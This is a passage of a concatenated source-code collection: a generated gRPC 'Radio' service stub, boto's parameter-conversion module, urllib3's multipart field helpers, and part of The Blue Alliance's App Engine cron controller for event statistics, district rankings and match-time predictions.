request_serializer=radiomessages__pb2.VolumeRequest.SerializeToString,
response_deserializer=radiomessages__pb2.StatusResponse.FromString,
)
self.SubscribeToUpdates = channel.unary_stream(
'/Radio/SubscribeToUpdates',
request_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
response_deserializer=radiomessages__pb2.StatusResponse.FromString,
)
self.UnsubscribeToUpdates = channel.unary_unary(
'/Radio/UnsubscribeToUpdates',
request_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
class RadioServicer(object):
def Play(self, request, context):
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Stop(self, request, context):
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Status(self, request, context):
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def SetVolume(self, request, context):
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def SubscribeToUpdates(self, request, context):
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def UnsubscribeToUpdates(self, request, context):
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_RadioServicer_to_server(servicer, server):
rpc_method_handlers = {
'Play': grpc.unary_unary_rpc_method_handler(
servicer.Play,
request_deserializer=radiomessages__pb2.PlayRequest.FromString,
response_serializer=radiomessages__pb2.StatusResponse.SerializeToString,
),
'Stop': grpc.unary_unary_rpc_method_handler(
servicer.Stop,
request_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
response_serializer=radiomessages__pb2.StatusResponse.SerializeToString,
),
'Status': grpc.unary_unary_rpc_method_handler(
servicer.Status,
request_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
response_serializer=radiomessages__pb2.StatusResponse.SerializeToString,
),
'SetVolume': grpc.unary_unary_rpc_method_handler(
servicer.SetVolume,
request_deserializer=radiomessages__pb2.VolumeRequest.FromString,
response_serializer=radiomessages__pb2.StatusResponse.SerializeToString,
),
'SubscribeToUpdates': grpc.unary_stream_rpc_method_handler(
servicer.SubscribeToUpdates,
request_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
response_serializer=radiomessages__pb2.StatusResponse.SerializeToString,
),
'UnsubscribeToUpdates': grpc.unary_unary_rpc_method_handler(
servicer.UnsubscribeToUpdates,
request_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'Radio', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
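# Illustrative client-side sketch (kept as a comment because this file is
# generated); assumes a server is listening on localhost:50051:
#
#   channel = grpc.insecure_channel('localhost:50051')
#   stub = RadioStub(channel)
#   status = stub.Status(google_dot_protobuf_dot_empty__pb2.Empty())
#   for update in stub.SubscribeToUpdates(
#           google_dot_protobuf_dot_empty__pb2.Empty()):
#       print(update)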
| mit |
azureplus/chromium_depot_tools | third_party/boto/roboto/param.py | 91 | 4533 | # Copyright (c) 2010 Mitch Garnaat http://garnaat.org/
# Copyright (c) 2010, Eucalyptus Systems, Inc.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
import os
class ValidationException(Exception):
    """Raised when a parameter value fails conversion.
    Note: ``Converter.convert`` below raises ``ValidationException``, but the
    original module neither defines nor imports it; this minimal definition is
    assumed so the error path does not fail with a ``NameError``.
    """
    def __init__(self, param, msg):
        super(ValidationException, self).__init__(
            'Invalid value for parameter %r: %s' % (getattr(param, 'name', param), msg))
        self.param = param
        self.msg = msg
class Converter(object):
@classmethod
def convert_string(cls, param, value):
# TODO: could do length validation, etc. here
if not isinstance(value, basestring):
raise ValueError
return value
@classmethod
def convert_integer(cls, param, value):
# TODO: could do range checking here
return int(value)
@classmethod
def convert_boolean(cls, param, value):
"""
For command line arguments, just the presence
of the option means True so just return True
"""
return True
@classmethod
def convert_file(cls, param, value):
if os.path.isfile(value):
return value
raise ValueError
@classmethod
def convert_dir(cls, param, value):
if os.path.isdir(value):
return value
raise ValueError
@classmethod
def convert(cls, param, value):
try:
if hasattr(cls, 'convert_'+param.ptype):
mthd = getattr(cls, 'convert_'+param.ptype)
else:
mthd = cls.convert_string
return mthd(param, value)
except:
raise ValidationException(param, '')
class Param(object):
def __init__(self, name=None, ptype='string', optional=True,
short_name=None, long_name=None, doc='',
metavar=None, cardinality=1, default=None,
choices=None, encoder=None, request_param=True):
self.name = name
self.ptype = ptype
self.optional = optional
self.short_name = short_name
self.long_name = long_name
self.doc = doc
self.metavar = metavar
self.cardinality = cardinality
self.default = default
self.choices = choices
self.encoder = encoder
self.request_param = request_param
@property
def optparse_long_name(self):
ln = None
if self.long_name:
ln = '--%s' % self.long_name
return ln
@property
def synopsis_long_name(self):
ln = None
if self.long_name:
ln = '--%s' % self.long_name
return ln
@property
def getopt_long_name(self):
ln = None
if self.long_name:
ln = '%s' % self.long_name
if self.ptype != 'boolean':
ln += '='
return ln
@property
def optparse_short_name(self):
sn = None
if self.short_name:
sn = '-%s' % self.short_name
return sn
@property
def synopsis_short_name(self):
sn = None
if self.short_name:
sn = '-%s' % self.short_name
return sn
@property
def getopt_short_name(self):
sn = None
if self.short_name:
sn = '%s' % self.short_name
if self.ptype != 'boolean':
sn += ':'
return sn
def convert(self, value):
"""
Convert a string value as received in the command line
tools and convert to the appropriate type of value.
Raise a ValidationError if the value can't be converted.
:type value: str
:param value: The value to convert. This should always
be a string.
"""
return Converter.convert(self, value)
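# Illustrative, self-contained sketch (not part of the original module)
# exercising Param and Converter with made-up values.
if __name__ == '__main__':
    port = Param(name='port', ptype='integer', short_name='p', long_name='port')
    print port.convert('8080')        # -> 8080 (int)
    print port.optparse_long_name     # -> '--port'
    print port.getopt_short_name      # -> 'p:'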
| bsd-3-clause |
gdimitris/FleetManagerBackend | virtual_env/lib/python2.7/site-packages/pip/_vendor/requests/packages/urllib3/fields.py | 1007 | 5833 | import email.utils
import mimetypes
from .packages import six
def guess_content_type(filename, default='application/octet-stream'):
"""
Guess the "Content-Type" of a file.
:param filename:
The filename to guess the "Content-Type" of using :mod:`mimetypes`.
:param default:
If no "Content-Type" can be guessed, default to `default`.
"""
if filename:
return mimetypes.guess_type(filename)[0] or default
return default
def format_header_param(name, value):
"""
Helper function to format and quote a single header parameter.
Particularly useful for header parameters which might contain
non-ASCII values, like file names. This follows RFC 2231, as
suggested by RFC 2388 Section 4.4.
:param name:
The name of the parameter, a string expected to be ASCII only.
:param value:
The value of the parameter, provided as a unicode string.
"""
if not any(ch in value for ch in '"\\\r\n'):
result = '%s="%s"' % (name, value)
try:
result.encode('ascii')
except UnicodeEncodeError:
pass
else:
return result
if not six.PY3: # Python 2:
value = value.encode('utf-8')
value = email.utils.encode_rfc2231(value, 'utf-8')
value = '%s*=%s' % (name, value)
return value
class RequestField(object):
"""
A data container for request body parameters.
:param name:
The name of this request field.
:param data:
The data/value body.
:param filename:
An optional filename of the request field.
:param headers:
An optional dict-like object of headers to initially use for the field.
"""
def __init__(self, name, data, filename=None, headers=None):
self._name = name
self._filename = filename
self.data = data
self.headers = {}
if headers:
self.headers = dict(headers)
@classmethod
def from_tuples(cls, fieldname, value):
"""
A :class:`~urllib3.fields.RequestField` factory from old-style tuple parameters.
Supports constructing :class:`~urllib3.fields.RequestField` from
parameter of key/value strings AND key/filetuple. A filetuple is a
(filename, data, MIME type) tuple where the MIME type is optional.
For example::
'foo': 'bar',
'fakefile': ('foofile.txt', 'contents of foofile'),
'realfile': ('barfile.txt', open('realfile').read()),
'typedfile': ('bazfile.bin', open('bazfile').read(), 'image/jpeg'),
'nonamefile': 'contents of nonamefile field',
Field names and filenames must be unicode.
"""
if isinstance(value, tuple):
if len(value) == 3:
filename, data, content_type = value
else:
filename, data = value
content_type = guess_content_type(filename)
else:
filename = None
content_type = None
data = value
request_param = cls(fieldname, data, filename=filename)
request_param.make_multipart(content_type=content_type)
return request_param
def _render_part(self, name, value):
"""
Overridable helper function to format a single header parameter.
:param name:
The name of the parameter, a string expected to be ASCII only.
:param value:
The value of the parameter, provided as a unicode string.
"""
return format_header_param(name, value)
def _render_parts(self, header_parts):
"""
Helper function to format and quote a single header.
Useful for single headers that are composed of multiple items. E.g.,
'Content-Disposition' fields.
:param header_parts:
        A sequence of (k, v) tuples or a :class:`dict` of (k, v) to format
as `k1="v1"; k2="v2"; ...`.
"""
parts = []
iterable = header_parts
if isinstance(header_parts, dict):
iterable = header_parts.items()
for name, value in iterable:
if value:
parts.append(self._render_part(name, value))
return '; '.join(parts)
def render_headers(self):
"""
Renders the headers for this request field.
"""
lines = []
sort_keys = ['Content-Disposition', 'Content-Type', 'Content-Location']
for sort_key in sort_keys:
if self.headers.get(sort_key, False):
lines.append('%s: %s' % (sort_key, self.headers[sort_key]))
for header_name, header_value in self.headers.items():
if header_name not in sort_keys:
if header_value:
lines.append('%s: %s' % (header_name, header_value))
lines.append('\r\n')
return '\r\n'.join(lines)
def make_multipart(self, content_disposition=None, content_type=None,
content_location=None):
"""
Makes this request field into a multipart request field.
This method overrides "Content-Disposition", "Content-Type" and
"Content-Location" headers to the request parameter.
:param content_type:
The 'Content-Type' of the request body.
:param content_location:
The 'Content-Location' of the request body.
"""
self.headers['Content-Disposition'] = content_disposition or 'form-data'
self.headers['Content-Disposition'] += '; '.join([
'', self._render_parts(
(('name', self._name), ('filename', self._filename))
)
])
self.headers['Content-Type'] = content_type
self.headers['Content-Location'] = content_location
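# Illustrative, self-contained sketch (not part of the original module):
# building a multipart form field from the documented key/filetuple shape and
# rendering its headers.
if __name__ == '__main__':
    field = RequestField.from_tuples(
        'attachment', ('report.txt', 'contents of report', 'text/plain'))
    print(field.render_headers())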
| mit |
phil-lopreiato/the-blue-alliance | controllers/cron_controller.py | 2 | 31586 | import datetime
import logging
import os
import json
from google.appengine.api import taskqueue
from google.appengine.ext import ndb
from google.appengine.ext import webapp
from google.appengine.ext.webapp import template
from consts.district_type import DistrictType
from consts.event_type import EventType
from controllers.api.api_status_controller import ApiStatusController
from database.district_query import DistrictsInYearQuery
from database.event_query import DistrictEventsQuery, EventQuery
from database.match_query import EventMatchesQuery
from database.team_query import DistrictTeamsQuery
from helpers.award_manipulator import AwardManipulator
from helpers.bluezone_helper import BlueZoneHelper
from helpers.district_helper import DistrictHelper
from helpers.district_manipulator import DistrictManipulator
from helpers.event_helper import EventHelper
from helpers.event_manipulator import EventManipulator
from helpers.event_details_manipulator import EventDetailsManipulator
from helpers.event_insights_helper import EventInsightsHelper
from helpers.event_team_manipulator import EventTeamManipulator
from helpers.event_team_status_helper import EventTeamStatusHelper
from helpers.event_team_repairer import EventTeamRepairer
from helpers.event_team_updater import EventTeamUpdater
from helpers.firebase.firebase_pusher import FirebasePusher
from helpers.insights_helper import InsightsHelper
from helpers.match_helper import MatchHelper
from helpers.match_time_prediction_helper import MatchTimePredictionHelper
from helpers.matchstats_helper import MatchstatsHelper
from helpers.notification_helper import NotificationHelper
from helpers.outgoing_notification_helper import OutgoingNotificationHelper
from helpers.playoff_advancement_helper import PlayoffAdvancementHelper
from helpers.prediction_helper import PredictionHelper
from helpers.insight_manipulator import InsightManipulator
from helpers.suggestions.suggestion_fetcher import SuggestionFetcher
from helpers.team_manipulator import TeamManipulator
from helpers.match_manipulator import MatchManipulator
from models.district import District
from models.event import Event
from models.event_details import EventDetails
from models.event_team import EventTeam
from models.match import Match
from models.sitevar import Sitevar
from models.suggestion import Suggestion
from models.team import Team
from models.typeahead_entry import TypeaheadEntry
class EventShortNameCalcEnqueue(webapp.RequestHandler):
"""
Enqueues Event short_name computation for official events
"""
def get(self, year):
event_keys = Event.query(Event.official == True, Event.year == int(year)).fetch(200, keys_only=True)
events = ndb.get_multi(event_keys)
for event in events:
taskqueue.add(
url='/tasks/math/do/event_short_name_calc_do/{}'.format(event.key.id()),
method='GET')
template_values = {'events': events}
path = os.path.join(os.path.dirname(__file__), '../templates/math/event_short_name_calc_enqueue.html')
self.response.out.write(template.render(path, template_values))
class EventShortNameCalcDo(webapp.RequestHandler):
"""
Computes Event short_name
"""
def get(self, event_key):
event = Event.get_by_id(event_key)
event.short_name = EventHelper.getShortName(event.name)
EventManipulator.createOrUpdate(event)
template_values = {'event': event}
path = os.path.join(os.path.dirname(__file__), '../templates/math/event_short_name_calc_do.html')
self.response.out.write(template.render(path, template_values))
class EventTeamRepairDo(webapp.RequestHandler):
"""
Repair broken EventTeams.
"""
def get(self):
event_teams_keys = EventTeam.query(EventTeam.year == None).fetch(keys_only=True)
event_teams = ndb.get_multi(event_teams_keys)
event_teams = EventTeamRepairer.repair(event_teams)
event_teams = EventTeamManipulator.createOrUpdate(event_teams)
# sigh. -gregmarra
if type(event_teams) == EventTeam:
event_teams = [event_teams]
template_values = {
'event_teams': event_teams,
}
path = os.path.join(os.path.dirname(__file__), '../templates/math/eventteam_repair_do.html')
self.response.out.write(template.render(path, template_values))
class EventTeamUpdate(webapp.RequestHandler):
"""
Task that updates the EventTeam index for an Event.
Can only update or delete EventTeams for unregistered teams.
^^^ Does it actually do this? Eugene -- 2013/07/30
"""
def get(self, event_key):
_, event_teams, et_keys_to_del = EventTeamUpdater.update(event_key)
if event_teams:
event_teams = filter(lambda et: et.team.get() is not None, event_teams)
event_teams = EventTeamManipulator.createOrUpdate(event_teams)
if et_keys_to_del:
EventTeamManipulator.delete_keys(et_keys_to_del)
template_values = {
'event_teams': event_teams,
'deleted_event_teams_keys': et_keys_to_del
}
path = os.path.join(os.path.dirname(__file__),
'../templates/math/eventteam_update_do.html')
self.response.out.write(template.render(path, template_values))
class EventTeamUpdateEnqueue(webapp.RequestHandler):
"""
Handles enqueing building attendance for Events.
"""
def get(self, when):
if when == "all":
event_keys = Event.query().fetch(10000, keys_only=True)
else:
event_keys = Event.query(Event.year == int(when)).fetch(10000, keys_only=True)
for event_key in event_keys:
taskqueue.add(
url='/tasks/math/do/eventteam_update/' + event_key.id(),
method='GET')
template_values = {
'event_keys': event_keys,
}
path = os.path.join(os.path.dirname(__file__), '../templates/math/eventteam_update_enqueue.html')
self.response.out.write(template.render(path, template_values))
class EventMatchstatsDo(webapp.RequestHandler):
"""
Calculates match stats (OPR/DPR/CCWM) for an event
Calculates predictions for an event
Calculates insights for an event
"""
def get(self, event_key):
event = Event.get_by_id(event_key)
matchstats_dict = MatchstatsHelper.calculate_matchstats(event.matches, event.year)
        if not any([v != {} for v in matchstats_dict.values()]):
            logging.warn("Matchstat calculation for {} failed!".format(event_key))
            matchstats_dict = None
predictions_dict = None
if event.year in {2016, 2017, 2018, 2019, 2020} and event.event_type_enum in EventType.SEASON_EVENT_TYPES or event.enable_predictions:
sorted_matches = MatchHelper.play_order_sort_matches(event.matches)
match_predictions, match_prediction_stats, stat_mean_vars = PredictionHelper.get_match_predictions(sorted_matches)
ranking_predictions, ranking_prediction_stats = PredictionHelper.get_ranking_predictions(sorted_matches, match_predictions)
predictions_dict = {
'match_predictions': match_predictions,
'match_prediction_stats': match_prediction_stats,
'stat_mean_vars': stat_mean_vars,
'ranking_predictions': ranking_predictions,
'ranking_prediction_stats': ranking_prediction_stats
}
event_insights = EventInsightsHelper.calculate_event_insights(event.matches, event.year)
event_details = EventDetails(
id=event_key,
matchstats=matchstats_dict,
predictions=predictions_dict,
insights=event_insights,
)
EventDetailsManipulator.createOrUpdate(event_details)
template_values = {
'matchstats_dict': matchstats_dict,
}
if 'X-Appengine-Taskname' not in self.request.headers: # Only write out if not in taskqueue
path = os.path.join(os.path.dirname(__file__), '../templates/math/event_matchstats_do.html')
self.response.out.write(template.render(path, template_values))
def post(self):
self.get()
class EventMatchstatsEnqueue(webapp.RequestHandler):
"""
Enqueues Matchstats calculation
"""
def get(self, when):
if when == "now":
events = EventHelper.getEventsWithinADay()
else:
events = Event.query(Event.year == int(when)).fetch(500)
EventHelper.sort_events(events)
for event in events:
taskqueue.add(
queue_name='run-in-order', # Because predictions depend on past events
url='/tasks/math/do/event_matchstats/' + event.key_name,
method='GET')
template_values = {
'event_count': len(events),
'year': when
}
path = os.path.join(os.path.dirname(__file__), '../templates/math/event_matchstats_enqueue.html')
self.response.out.write(template.render(path, template_values))
class FinalMatchesRepairDo(webapp.RequestHandler):
"""
Repairs zero-indexed final matches
"""
def get(self, year):
year_event_keys = Event.query(Event.year == int(year)).fetch(1000, keys_only=True)
final_match_keys = []
for event_key in year_event_keys:
final_match_keys.extend(Match.query(Match.event == event_key, Match.comp_level == 'f').fetch(100, keys_only=True))
match_keys_to_repair = []
for match_key in final_match_keys:
key_name = match_key.id()
if '_f0m' in key_name:
match_keys_to_repair.append(match_key)
deleted_keys = []
matches_to_repair = ndb.get_multi(match_keys_to_repair)
for match in matches_to_repair:
deleted_keys.append(match.key)
event = ndb.get_multi([match.event])[0]
match.set_number = 1
match.key = ndb.Key(Match, Match.renderKeyName(
event.key.id(),
match.comp_level,
match.set_number,
match.match_number))
MatchManipulator.createOrUpdate(matches_to_repair)
MatchManipulator.delete_keys(deleted_keys)
template_values = {'deleted_keys': deleted_keys,
'new_matches': matches_to_repair}
path = os.path.join(os.path.dirname(__file__), '../templates/math/final_matches_repair_do.html')
self.response.out.write(template.render(path, template_values))
class YearInsightsEnqueue(webapp.RequestHandler):
"""
Enqueues Insights calculation of a given kind for a given year
"""
def get(self, kind, year):
taskqueue.add(
target='backend-tasks-b2',
url='/backend-tasks-b2/math/do/insights/{}/{}'.format(kind, year),
method='GET')
template_values = {
'kind': kind,
'year': year
}
path = os.path.join(os.path.dirname(__file__), '../templates/math/year_insights_enqueue.html')
self.response.out.write(template.render(path, template_values))
class YearInsightsDo(webapp.RequestHandler):
"""
Calculates insights of a given kind for a given year.
Calculations of a given kind should reuse items fetched from the datastore.
"""
def get(self, kind, year):
year = int(year)
insights = None
if kind == 'matches':
insights = InsightsHelper.doMatchInsights(year)
elif kind == 'awards':
insights = InsightsHelper.doAwardInsights(year)
elif kind == 'predictions':
insights = InsightsHelper.doPredictionInsights(year)
if insights is not None:
InsightManipulator.createOrUpdate(insights)
template_values = {
'insights': insights,
'year': year,
'kind': kind,
}
path = os.path.join(os.path.dirname(__file__), '../templates/math/year_insights_do.html')
self.response.out.write(template.render(path, template_values))
def post(self):
self.get()
class OverallInsightsEnqueue(webapp.RequestHandler):
"""
Enqueues Overall Insights calculation for a given kind.
"""
def get(self, kind):
taskqueue.add(
target='backend-tasks-b2',
url='/backend-tasks-b2/math/do/overallinsights/{}'.format(kind),
method='GET')
template_values = {
'kind': kind,
}
path = os.path.join(os.path.dirname(__file__), '../templates/math/overall_insights_enqueue.html')
self.response.out.write(template.render(path, template_values))
class OverallInsightsDo(webapp.RequestHandler):
"""
Calculates overall insights of a given kind.
Calculations of a given kind should reuse items fetched from the datastore.
"""
def get(self, kind):
insights = None
if kind == 'matches':
insights = InsightsHelper.doOverallMatchInsights()
elif kind == 'awards':
insights = InsightsHelper.doOverallAwardInsights()
if insights is not None:
InsightManipulator.createOrUpdate(insights)
template_values = {
'insights': insights,
'kind': kind,
}
path = os.path.join(os.path.dirname(__file__), '../templates/math/overall_insights_do.html')
self.response.out.write(template.render(path, template_values))
def post(self):
self.get()
class TypeaheadCalcEnqueue(webapp.RequestHandler):
"""
Enqueues typeahead calculations
"""
def get(self):
taskqueue.add(
target='backend-tasks-b2',
url='/backend-tasks-b2/math/do/typeaheadcalc',
method='GET')
template_values = {}
path = os.path.join(os.path.dirname(__file__), '../templates/math/typeaheadcalc_enqueue.html')
self.response.out.write(template.render(path, template_values))
class TypeaheadCalcDo(webapp.RequestHandler):
"""
Calculates typeahead entries
"""
def get(self):
@ndb.tasklet
def get_events_async():
event_keys = yield Event.query().order(-Event.year).order(Event.name).fetch_async(keys_only=True)
events = yield ndb.get_multi_async(event_keys)
raise ndb.Return(events)
@ndb.tasklet
def get_teams_async():
team_keys = yield Team.query().order(Team.team_number).fetch_async(keys_only=True)
teams = yield ndb.get_multi_async(team_keys)
raise ndb.Return(teams)
@ndb.tasklet
def get_districts_async():
district_keys = yield District.query().order(-District.year).fetch_async(keys_only=True)
districts = yield ndb.get_multi_async(district_keys)
raise ndb.Return(districts)
@ndb.toplevel
def get_events_teams_districts():
events, teams, districts = yield get_events_async(), get_teams_async(), get_districts_async()
raise ndb.Return((events, teams, districts))
events, teams, districts = get_events_teams_districts()
results = {}
for team in teams:
if not team.nickname:
nickname = "Team %s" % team.team_number
else:
nickname = team.nickname
data = '%s | %s' % (team.team_number, nickname)
if TypeaheadEntry.ALL_TEAMS_KEY in results:
results[TypeaheadEntry.ALL_TEAMS_KEY].append(data)
else:
results[TypeaheadEntry.ALL_TEAMS_KEY] = [data]
for district in districts:
data = '%s District [%s]' % (district.display_name, district.abbreviation.upper())
# all districts
if TypeaheadEntry.ALL_DISTRICTS_KEY in results:
if data not in results[TypeaheadEntry.ALL_DISTRICTS_KEY]:
results[TypeaheadEntry.ALL_DISTRICTS_KEY].append(data)
else:
results[TypeaheadEntry.ALL_DISTRICTS_KEY] = [data]
for event in events:
data = '%s %s [%s]' % (event.year, event.name, event.event_short.upper())
# all events
if TypeaheadEntry.ALL_EVENTS_KEY in results:
results[TypeaheadEntry.ALL_EVENTS_KEY].append(data)
else:
results[TypeaheadEntry.ALL_EVENTS_KEY] = [data]
# events by year
if TypeaheadEntry.YEAR_EVENTS_KEY.format(event.year) in results:
results[TypeaheadEntry.YEAR_EVENTS_KEY.format(event.year)].append(data)
else:
results[TypeaheadEntry.YEAR_EVENTS_KEY.format(event.year)] = [data]
# Prepare to remove old entries
old_entry_keys_future = TypeaheadEntry.query().fetch_async(keys_only=True)
# Add new entries
entries = []
for key_name, data in results.items():
entries.append(TypeaheadEntry(id=key_name, data_json=json.dumps(data)))
ndb.put_multi(entries)
# Remove old entries
old_entry_keys = set(old_entry_keys_future.get_result())
new_entry_keys = set([ndb.Key(TypeaheadEntry, key_name) for key_name in results.keys()])
keys_to_delete = old_entry_keys.difference(new_entry_keys)
logging.info("Removing the following unused TypeaheadEntries: {}".format([key.id() for key in keys_to_delete]))
ndb.delete_multi(keys_to_delete)
template_values = {'results': results}
path = os.path.join(os.path.dirname(__file__), '../templates/math/typeaheadcalc_do.html')
self.response.out.write(template.render(path, template_values))
class DistrictPointsCalcEnqueue(webapp.RequestHandler):
"""
Enqueues calculation of district points for all season events for a given year
"""
def get(self, year):
year = int(year)
event_keys = Event.query(Event.year == year, Event.event_type_enum.IN(EventType.SEASON_EVENT_TYPES)).fetch(None, keys_only=True)
for event_key in event_keys:
taskqueue.add(url='/tasks/math/do/district_points_calc/{}'.format(event_key.id()), method='GET')
self.response.out.write("Enqueued for: {}".format([event_key.id() for event_key in event_keys]))
class DistrictPointsCalcDo(webapp.RequestHandler):
"""
Calculates district points for an event
"""
def get(self, event_key):
event = Event.get_by_id(event_key)
if event.event_type_enum not in EventType.SEASON_EVENT_TYPES and not self.request.get('allow-offseason', None):
if 'X-Appengine-Taskname' not in self.request.headers:
self.response.out.write("Can't calculate district points for a non-season event {}!"
.format(event.key_name))
return
district_points = DistrictHelper.calculate_event_points(event)
event_details = EventDetails(
id=event_key,
district_points=district_points
)
EventDetailsManipulator.createOrUpdate(event_details)
if 'X-Appengine-Taskname' not in self.request.headers: # Only write out if not in taskqueue
self.response.out.write(event.district_points)
# Enqueue task to update rankings
if event.district_key:
taskqueue.add(url='/tasks/math/do/district_rankings_calc/{}'.format(event.district_key.id()), method='GET')
class DistrictRankingsCalcEnqueue(webapp.RequestHandler):
"""
Enqueues calculation of rankings for all districts for a given year
"""
def get(self, year):
districts = DistrictsInYearQuery(int(year)).fetch()
district_keys = [district.key.id() for district in districts]
for district_key in district_keys:
taskqueue.add(url='/tasks/math/do/district_rankings_calc/{}'.format(district_key), method='GET')
taskqueue.add(url='/backend-tasks/get/district_rankings/{}'.format(district_key), method='GET')
self.response.out.write("Enqueued for: {}".format(district_keys))
class DistrictRankingsCalcDo(webapp.RequestHandler):
"""
Calculates district rankings for a district year
"""
def get(self, district_key):
district = District.get_by_id(district_key)
if not district:
self.response.out.write("District {} does not exist!".format(district_key))
return
events_future = DistrictEventsQuery(district_key).fetch_async()
teams_future = DistrictTeamsQuery(district_key).fetch_async()
events = events_future.get_result()
for event in events:
event.prep_details()
EventHelper.sort_events(events)
team_totals = DistrictHelper.calculate_rankings(events, teams_future, district.year)
rankings = []
current_rank = 1
for key, points in team_totals:
point_detail = {}
point_detail["rank"] = current_rank
point_detail["team_key"] = key
point_detail["event_points"] = []
for event, event_points in points["event_points"]:
event_points['event_key'] = event.key.id()
event_points['district_cmp'] = (
event.event_type_enum == EventType.DISTRICT_CMP or
event.event_type_enum == EventType.DISTRICT_CMP_DIVISION)
point_detail["event_points"].append(event_points)
point_detail["rookie_bonus"] = points.get("rookie_bonus", 0)
point_detail["point_total"] = points["point_total"]
rankings.append(point_detail)
current_rank += 1
if rankings:
district.rankings = rankings
DistrictManipulator.createOrUpdate(district)
if 'X-Appengine-Taskname' not in self.request.headers: # Only write out if not in taskqueue
self.response.out.write("Finished calculating rankings for: {}".format(district_key))
class EventTeamStatusCalcEnqueue(webapp.RequestHandler):
"""
Enqueues calculation of event team status for a year
"""
def get(self, year):
event_keys = [e.id() for e in Event.query(Event.year==int(year)).fetch(keys_only=True)]
for event_key in event_keys:
taskqueue.add(url='/tasks/math/do/event_team_status/{}'.format(event_key), method='GET')
self.response.out.write("Enqueued for: {}".format(event_keys))
class EventTeamStatusCalcDo(webapp.RequestHandler):
"""
Calculates event team statuses for all teams at an event
"""
def get(self, event_key):
event = Event.get_by_id(event_key)
event_teams = EventTeam.query(EventTeam.event==event.key).fetch()
for event_team in event_teams:
status = EventTeamStatusHelper.generate_team_at_event_status(event_team.team.id(), event)
event_team.status = status
FirebasePusher.update_event_team_status(event_key, event_team.team.id(), status)
EventTeamManipulator.createOrUpdate(event_teams)
if 'X-Appengine-Taskname' not in self.request.headers: # Only write out if not in taskqueue
self.response.out.write("Finished calculating event team statuses for: {}".format(event_key))
class UpcomingNotificationDo(webapp.RequestHandler):
"""
Sends out notifications for upcoming matches
"""
def get(self):
live_events = EventHelper.getEventsWithinADay()
NotificationHelper.send_upcoming_matches(live_events)
class UpdateLiveEventsDo(webapp.RequestHandler):
"""
Updates live events
"""
def get(self):
FirebasePusher.update_live_events()
class MatchTimePredictionsEnqueue(webapp.RequestHandler):
"""
Enqueue match time predictions for all current events
"""
def get(self):
live_events = EventHelper.getEventsWithinADay()
for event in live_events:
taskqueue.add(url='/tasks/math/do/predict_match_times/{}'.format(event.key_name),
method='GET')
# taskqueue.add(url='/tasks/do/bluezone_update', method='GET')
# Clear down events for events that aren't live
status_sitevar = Sitevar.get_by_id('apistatus.down_events')
if status_sitevar is not None:
live_event_keys = set([e.key.id() for e in live_events])
old_status = set(status_sitevar.contents)
new_status = old_status.copy()
for event_key in old_status:
if event_key not in live_event_keys:
new_status.remove(event_key)
status_sitevar.contents = list(new_status)
status_sitevar.put()
# Clear API Response cache
ApiStatusController.clear_cache_if_needed(old_status, new_status)
self.response.out.write("Enqueued time prediction for {} events".format(len(live_events)))
class MatchTimePredictionsDo(webapp.RequestHandler):
"""
Predicts match times for a given live event
Also handles detection for whether the event is down
"""
def get(self, event_key):
import pytz
event = Event.get_by_id(event_key)
if not event:
self.abort(404)
matches = event.matches
if not matches or not event.timezone_id:
return
timezone = pytz.timezone(event.timezone_id)
played_matches = MatchHelper.recentMatches(matches, num=0)
unplayed_matches = MatchHelper.upcomingMatches(matches, num=len(matches))
MatchTimePredictionHelper.predict_future_matches(event_key, played_matches, unplayed_matches, timezone, event.within_a_day)
# Detect whether the event is down
# An event is NOT down if ANY unplayed match's predicted time is within a threshold of its scheduled time, or if
# the last played match (if it exists) wasn't too long ago.
event_down = len(unplayed_matches) > 0
for unplayed_match in unplayed_matches:
if ((unplayed_match.predicted_time and unplayed_match.time and
unplayed_match.predicted_time < unplayed_match.time + datetime.timedelta(minutes=30)) or
(played_matches == [] or played_matches[-1].actual_time is None or played_matches[-1].actual_time > datetime.datetime.now() - datetime.timedelta(minutes=30))):
event_down = False
break
status_sitevar = Sitevar.get_by_id('apistatus.down_events')
if status_sitevar is None:
status_sitevar = Sitevar(id="apistatus.down_events", description="A list of down event keys", values_json="[]")
old_status = set(status_sitevar.contents)
new_status = old_status.copy()
if event_down:
new_status.add(event_key)
elif event_key in new_status:
new_status.remove(event_key)
